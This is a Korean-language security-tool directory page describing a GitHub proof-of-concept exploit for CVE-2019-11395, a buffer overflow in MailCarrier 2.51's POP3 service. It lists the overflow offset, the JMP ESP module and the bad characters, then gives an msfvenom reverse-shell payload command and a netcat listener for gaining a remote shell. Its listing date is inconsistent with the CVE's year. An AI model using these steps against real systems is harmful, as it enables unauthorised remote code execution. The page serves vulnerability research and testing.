Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/caioprince/cve-2019-11395
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingBinary Exploitation
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

MailCarrier 2.51 POP3 서비스의 버퍼 오버플로우인 CVE-2019-11395용 Python 익스플로잇입니다. msfvenom을 통해 리버스 셸 페이로드를 생성하고 Windows 대상에서 원격 코드 실행을 달성합니다.

저장소 보기
22년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-11395 익스플로잇 🛡️

CVE-2019-11395 정보 🕵️

CVE-2019-11395 취약점은 MailCarrier 2.51 이메일 애플리케이션의 버퍼 오버플로 취약점으로, 원격 코드 실행을 허용합니다. 이 취약점은 SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP 또는 POP3 RETR 프로세스에서 발생합니다.

학술 연구 과정에서 PoC(Proof of Concept)를 제작하기 위해 POP3 프로세스에 초점을 맞추었습니다. 애플리케이션에 6000바이트를 전송하면 작동이 중지되어 버퍼 오버플로 취약점이 드러난다는 것을 확인했습니다.

익스플로잇 단계 🔍

  1. EIP를 정확히 식별하기 위해 msf-pattern_create -l 6000을 사용했습니다.
  2. msf-pattern_offset -q 6E47386E -l 6000으로 EIP 오프셋을 확인했으며, EIP 오프셋은 5095입니다.
  3. ASLR이 비활성화된 expsrv.dll을 식별하여 JMP ESP에 적합함을 확인했습니다.
  4. 잘못된 문자를 테스트하는 과정에서 배드 캐릭터 \x00\x0a\x0d를 식별했습니다.
  5. msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode로 페이로드를 생성했습니다.
  6. 페이로드를 수용하도록 CVE-2019-11395.py 코드를 조정했습니다.
  7. nc -lnvp 4444로 연결을 열고 익스플로잇(CVE-2019-11395.py)을 실행하여 환경에 대한 액세스 권한을 획득하고 설명된 CVE를 검증했습니다.

사용 방법 🚀

익스플로잇을 사용하려면 다음 단계를 따르세요:

  1. msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode를 사용하여 페이로드를 생성합니다.
  2. msfvenom 명령의 출력을 복사합니다.
  3. CVE-2019-11395.py 코드를 조정하여 shellcode 변수를 msfvenom 명령에서 얻은 출력으로 교체합니다.
  4. 익스플로잇(CVE-2019-11395.py)을 실행하여 환경에 대한 액세스 권한을 획득하고 설명된 CVE를 검증합니다.

침해된 환경 📸

PoC CVE-2019-11395

🔗 나와 연결하기

LinkedIn에서 내 프로필을 방문하세요

도구 다운로드